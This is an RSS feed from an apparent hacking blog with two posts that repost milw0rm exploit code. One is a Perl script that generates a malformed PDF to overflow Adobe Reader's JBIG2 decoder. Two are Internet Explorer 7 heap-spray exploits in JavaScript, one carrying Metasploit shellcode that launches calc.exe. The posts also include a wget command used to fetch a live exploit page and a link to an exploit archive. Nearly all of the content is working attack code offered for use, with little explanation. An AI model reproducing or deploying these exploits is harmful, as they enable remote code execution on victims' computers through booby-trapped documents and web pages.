<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>kernelpanic.org.mx &#187; exploits</title>
	<atom:link href="http://kernelpanic.org.mx/tag/exploits/feed/" rel="self" type="application/rss+xml" />
	<link>http://kernelpanic.org.mx</link>
	<description></description>
	<lastBuildDate>Mon, 29 Mar 2010 21:11:26 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.0</generator>
		<item>
		<title>[ highlighted ]</title>
		<link>http://kernelpanic.org.mx/2009/02/highlighted/</link>
		<comments>http://kernelpanic.org.mx/2009/02/highlighted/#comments</comments>
		<pubDate>Wed, 25 Feb 2009 22:53:30 +0000</pubDate>
		<dc:creator>zerialkiller</dc:creator>
				<category><![CDATA[exploits]]></category>
		<category><![CDATA[ie7]]></category>
		<category><![CDATA[internet explorer 7]]></category>
		<category><![CDATA[remoto]]></category>

		<guid isPermaLink="false">http://h4ck3rx.org/?p=296</guid>
		<description><![CDATA[Adobe Acrobat Reader JBIG2 Local Buffer Overflow PoC #2 0day   &#38;&#38; MS Internet Explorer 7 Memory Corruption PoC (MS09-002) #!/usr/bin/perl # k`sOSe 02/22/2009 # http://vrt-sourcefire.blogspot.com/2009/02/have-nice-weekend-pdf-love.html my $size = "\x40\x00"; my $factor = "ABCD"; my $data = "A" x 8314; print pdf(); sub pdf() { "%PDF-1.5\n" . "%\xec\xf5\xf2\xe1\xe4\xef\xe3\xf5\xed\xe5\xee\xf4\n" . "3 0 \n" . "xref\n" . "3 [...]]]></description>
			<content:encoded><![CDATA[<p>Adobe Acrobat Reader JBIG2 Local Buffer Overflow PoC #2 0day   &amp;&amp;  <a class="style17" href="http://www.milw0rm.com/exploits/8077" target="_blank">MS Internet Explorer 7 Memory Corruption PoC (MS09-002)</a></p>
<pre>#!/usr/bin/perl
# k`sOSe 02/22/2009

# http://vrt-sourcefire.blogspot.com/2009/02/have-nice-weekend-pdf-love.html

my $size = "\x40\x00";
my $factor = "ABCD";
my $data = "A" x 8314;

print pdf();

sub pdf()
{

"%PDF-1.5\n" .
"%\xec\xf5\xf2\xe1\xe4\xef\xe3\xf5\xed\xe5\xee\xf4\n" .
"3 0      \n" .
"xref\n" .
"3 16\n" .
"0000000023 00000 n \n" .
"0000000584 00000 n \n" .
"0000000865 00000 n \n" .
"0000001035 00000 n \n" .
"0000001158 00000 n \n" .
"0000001287 00000 n \n" .
"0000001338 00000 n \n" .
"0000001384 00000 n \n" .
"0000002861 00000 n \n" .
"0000003637 00000 n \n"  .
"0000005126 00000 n \n" .
"0000005173 00000 n \n" .
"0000005317 00000 n \n" .
"0000005370 00000 n \n" .
"0000005504 00000 n \n" .
"0000000714 00000 n \n" .
"trailer\n" .
"&lt;&lt;/Root 4 0 R/Info 2 0 R/ID[&lt;AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&gt; &lt;AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&gt;]/Size 19/Prev 10218&gt;&gt;\n" .
"startxref\n" .
"0\n" .
"%%EOF\n" .
"   \n" .
"4 0 obj\n" .
"&lt;&lt;/Type/Catalog/Pages 1 0 R/OCProperties&lt;&lt;/OCGs[9 0 R 13 0 R]/D&lt;&lt;/Order[9 0 R 13 0 R]/ON[9 0 R 13 0 R]/OFF[]&gt;&gt;&gt;&gt;&gt;&gt;\n" .
"endobj\n" .
"         \n" .
"5 0 obj\n" .
"&lt;&lt;/Type/Page/MediaBox[0 0 640 480]/Resources&lt;&lt;/XObject&lt;&lt;/Im001 7 0 R/Im002 10 0 R/Im003 11 0 R/Im004 14 0 R/Im005 16 0 R&gt;&gt;&gt;&gt;/Contents 6 0 R/Parent 1 0 R&gt;&gt;\n" .
"endobj\n" .
"6 0 obj\n" .
"&lt;&lt;/Length 56/Filter/FlateDecode&gt;&gt;\n" .
"stream\n" .
"x\x9c\xe3*T031P\x00A\x13\x0b\x08\x9d\x9c\xab\xa0\xef\x99k``\xa8\xe0\x92\xaf\x10\xc8\x85[\x81\x11!\x05\xc6\x84\x14\x98\xc0\x14\xc0\$\@\xb4\x05\xb2\n" .
"S\xb0\n" .
"\x00J\x15#,\n" .
"endstream\n" .
"endobj\n" .

"12 0 obj\n" .
"&lt;&lt;/Subtype/Image/Width 640/Height 480/ColorSpace/DeviceGray/BitsPerComponent 1/Decode[1 0]/Interpolate true/Length 1314/Filter/JBIG2Decode&gt;&gt;\n" .
"stream\n" .
"\x00\x00\x00\x01" . $size . $factor . "\x13" . $data . "endstream\n" .
"endobj\n" .
"13 0 obj\n" .
"&lt;&lt;/Type/OCG/Name(Text Color)&gt;&gt;\n" .
"endobj\n" .
"14 0 obj\n" .
"&lt;&lt;/Subtype/Image/Width 1/Height 1/ColorSpace/DeviceGray/BitsPerComponent 8/SMask 12 0 R/OC 15 0 R/Length 1&gt;&gt;\n" .
"stream\n" .
"\x00\n" .
"endstream\n" .
"endobj\n" .

"1 0 obj\n" .
"&lt;&lt;/Type/Pages/Kids[5 0 R]/Count 1&gt;&gt;\n" .
"endobj\n" .
"xref\n" .
"0 3\n" .
"0000000000 65535 f \n" .
"0000009988 00000 n \n" .
"0000010039 00000 n \n" .
"trailer\n" .
"&lt;&lt;/ID[&lt;AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&gt; &lt;AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&gt;]/Size 3&gt;&gt;\n" .
"startxref\n" .
"104\n" .
"%%EOF\n";

}

# milw0rm.com [2009-02-23]

----------------------------------------------------------------------------------------------

<a class="style17" href="http://www.milw0rm.com/exploits/8077" target="_blank">MS Internet Explorer 7 Memory Corruption PoC (MS09-002)</a>

&lt;!--
MS09-002
===============================
grabbed from:
wget http://www.chengjitj.com/bbs/images/alipay/mm/jc/jc.html --user-agent="MSIE 7.0; Windows NT 5.1"

took a little but found it. /str0ke
--&gt;

&lt;script language="JavaScript"&gt;

var c="putyourshizhere-unescaped";

var array = new Array();

var ls = 0x100000-(c.length*2+0x01020);

var b = unescape("%u0C0C%u0C0C");
while(b.length&lt;ls/2) { b+=b;}
var lh = b.substring(0,ls/2);
delete b;

for(i=0; i&lt;0xC0; i++) {
	array[i] = lh + c;
}

CollectGarbage();

var s1=unescape("%u0b0b%u0b0bAAAAAAAAAAAAAAAAAAAAAAAAA");
var a1 = new Array();
for(var x=0;x&lt;1000;x++) a1.push(document.createElement("img"));

function ok() {
	o1=document.createElement("tbody");
	o1.click;
	var o2 = o1.cloneNode();
	o1.clearAttributes();
	o1=null; CollectGarbage();
	for(var x=0;x&lt;a1.length;x++) a1[x].src=s1;
	o2.click;
}
&lt;/script&gt;&lt;script&gt;window.setTimeout("ok();",800);&lt;/script&gt;

# milw0rm.com [2009-02-18]</pre>
]]></content:encoded>
			<wfw:commentRss>http://kernelpanic.org.mx/2009/02/highlighted/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Dos pequeños pero muy lindos Xpl0itZ</title>
		<link>http://kernelpanic.org.mx/2008/12/dos-pequenos-pero-muy-lindos-xpl0itz/</link>
		<comments>http://kernelpanic.org.mx/2008/12/dos-pequenos-pero-muy-lindos-xpl0itz/#comments</comments>
		<pubDate>Tue, 16 Dec 2008 19:28:26 +0000</pubDate>
		<dc:creator>zerialkiller</dc:creator>
				<category><![CDATA[exploits]]></category>
		<category><![CDATA[exploits windows]]></category>
		<category><![CDATA[underground]]></category>

		<guid isPermaLink="false">http://h4ck3rx.org/?p=265</guid>
		<description><![CDATA[Estos exploits ya tienen algun tiempo que fueron publicados en http://www.milw0rm.com/ hasi que espero ya allan jugado lo suficiente con ellos como yo. // k`sOSe 12/10/2008 &#8211; tested on winxp sp3, explorer 7.0.5730.13 // windows/exec &#8211; 141 bytes // http://www.metasploit.com // EXITFUNC=seh, CMD=C:\WINDOWS\system32\calc.exe http://milw0rm.com/sploits/2008-iesploit.tar.gz # milw0rm.com [2008-12-10] &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211; &#60;html&#62; &#60;script&#62; // k`sOSe 12/10/2008 // Tested [...]]]></description>
			<content:encoded><![CDATA[<p>Estos exploits ya tienen algun tiempo que fueron publicados en http://www.milw0rm.com/ hasi que espero ya allan jugado lo suficiente con ellos como yo.</p>
<p>// k`sOSe 12/10/2008 &#8211; tested on winxp sp3, explorer 7.0.5730.13</p>
<p>// windows/exec &#8211; 141 bytes<br />
// http://www.metasploit.com<br />
// EXITFUNC=seh, CMD=C:\WINDOWS\system32\calc.exe</p>
<p>http://milw0rm.com/sploits/2008-iesploit.tar.gz</p>
<p># milw0rm.com [2008-12-10]<br />
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;</p>
<pre>&lt;html&gt;
&lt;script&gt;

	// k`sOSe 12/10/2008
	// Tested on Vista SP1, Explorer 7.0.6001.18000 and Vista SP0, Explorer 7.0.6000.16386
 	// Heap spray address adjusted for Vista - muts / offensive-security.com
	// http://secmaniac.blogspot.com/2008/12/ms-internet-explorer-xml-parsing-remote.html
	// http://www.offensive-security.com/0day/iesploit-vista.rar
	// windows/exec - 141 bytes
	// http://www.metasploit.com
	// EXITFUNC=seh, CMD=C:\WINDOWS\system32\calc.exe
	var shellcode = unescape("%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%u315f%u60f6%u6456%u468b%u8b30%u0c40%u708b%uad1c%u688b%u8908%u83f8%u6ac0%u6850%u8af0%u5f04%u9868%u8afe%u570e%ue7ff%u3a43%u575c%u4e49%u4f44%u5357%u735c%u7379%u6574%u336d%u5c32%u6163%u636c%u652e%u6578%u4100");
  	var block = unescape("%u0c0c%u0c0c");
	var nops = unescape("%u9090%u9090%u9090");

	while (block.length &lt; 81920) block += block;
	var memory = new Array();
	var i=0;
	for (;i&lt;1000;i++) memory[i] += (block + nops + shellcode);

	document.write("&lt;iframe src=\"iframe.html\"&gt;");

&lt;/script&gt;

&lt;/html&gt;

&lt;!-- iframe.html

&lt;XML ID=I&gt;
	&lt;X&gt;
		&lt;C&gt;
			&lt;![CDATA[
				&lt;image
					SRC=http://&amp;#3084;&amp;#3084;.xxxxx.org
				&gt;
			 ]]&gt;

		&lt;/C&gt;
	&lt;/X&gt;
&lt;/XML&gt;

&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;
	&lt;XML ID=I&gt;
	&lt;/XML&gt;

	&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;
	&lt;/SPAN&gt;
&lt;/SPAN&gt;

--&gt;

# milw0rm.com [2008-12-10]</pre>
]]></content:encoded>
			<wfw:commentRss>http://kernelpanic.org.mx/2008/12/dos-pequenos-pero-muy-lindos-xpl0itz/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
	</channel>
</rss>
